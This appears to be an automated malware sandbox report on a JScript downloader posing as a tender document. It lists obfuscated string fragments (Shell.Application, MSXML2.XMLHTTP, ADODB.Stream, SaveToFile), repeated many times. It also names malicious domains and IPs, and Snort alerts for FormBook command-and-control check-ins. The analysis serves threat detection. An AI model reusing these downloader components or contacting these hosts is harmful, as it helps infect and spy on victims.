          Source: 0900664 MOHS Tender..jsReturn value : ['"Shell.Application"', '3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,', '45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', 'MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,', '"SaveToFile"', '"ADODB.Stream"', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"Shell.Application"', '3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,', '45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', 'MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,', '"SaveToFile"', '"ADODB.Stream"', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"Shell.Application"', '3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,', '45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', 'MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,', '"SaveToFile"', '"ADODB.Stream"', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"Shell.Application"', '3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,', '45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', 'MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,', '"SaveToFile"', '"ADODB.Stream"', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"Shell.Application"', '3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,', '45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', 'MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,', '"SaveToFile"', '"ADODB.Stream"', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"Shell.Application"', '3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Sc', 'F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,', 'cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.F', '45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', 'MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,', '"SaveToFile"', 'pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVe', '"ADODB.Stream"', 'ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdS', 'vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"Shell.Application"', '3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Sc', 'F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,', 'cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.F', '45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', 'MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,', '"SaveToFile"', 'pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVe', '"ADODB.Stream"', 'ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdS', 'vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"Shell.Application"', '3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Sc', 'F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,', 'cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.F', '45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', 'MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,', '"SaveToFile"', 'pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVe', '"ADODB.Stream"', 'ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdS', 'vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"Shell.Application"', '3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Sc', 'F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,', 'cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.F', '45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', 'MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,', '"SaveToFile"', 'pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVe', '"ADODB.Stream"', 'ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdS', 'vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
          Source: 0900664 MOHS Tender..jsReturn value : ['"Shell.Application"', '3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI1', 'FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Sc', 'F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,', 'cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.F', '45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,', 'WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL', 'tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk', 'MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSk', 'SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://', 'jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyf', '"Scripting.FileSystemObject"', 'MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,', '"SaveToFile"', 'pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVe', '"ADODB.Stream"', 'ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdS', 'vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7', 'Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,127754', '12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,']Go to definition
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi6_2_00758D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi6_2_00758D76
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi6_2_00754DAB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi6_2_00758D8F

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.arritalvigo.com
          Source: C:\Windows\explorer.exeDomain query: www.hougou.ru
          Source: C:\Windows\explorer.exeDomain query: www.hayethe.site
          Source: C:\Windows\explorer.exeNetwork Connect: 137.59.148.248 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.octohoki.net
          Source: C:\Windows\System32\wscript.exeDomain query: hirosguide.hu
          Source: C:\Windows\explorer.exeNetwork Connect: 64.34.68.10 80Jump to behavior
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 91.227.138.48 443Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.28.121 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lakeviewautomation.com
          Source: C:\Windows\explorer.exeDomain query: www.toporsche.online
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.149 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.179.191 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.chimid.org
          Source: C:\Windows\explorer.exeDomain query: www.dellaone.com
          Source: C:\Windows\explorer.exeDomain query: www.panalobet88.net
          Source: C:\Windows\explorer.exeNetwork Connect: 142.44.131.177 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.genuineinsights.cloud
          Source: C:\Windows\explorer.exeDomain query: www.frogair.online
          Source: C:\Windows\explorer.exeNetwork Connect: 14.128.47.126 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.deglaz.xyz
          Source: C:\Windows\explorer.exeDomain query: www.yeah-go.com
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.94 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.versusfinances.tech
          Source: C:\Windows\explorer.exeNetwork Connect: 185.104.28.238 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.laylaroseuk.com
          Source: C:\Windows\explorer.exeDomain query: www.44yyds.com
          Source: C:\Windows\explorer.exeNetwork Connect: 67.215.9.138 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 194.58.112.174 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 87.236.16.153 80Jump to behavior
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49707 -> 14.128.47.126:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49707 -> 14.128.47.126:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49707 -> 14.128.47.126:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 66.96.162.149:80
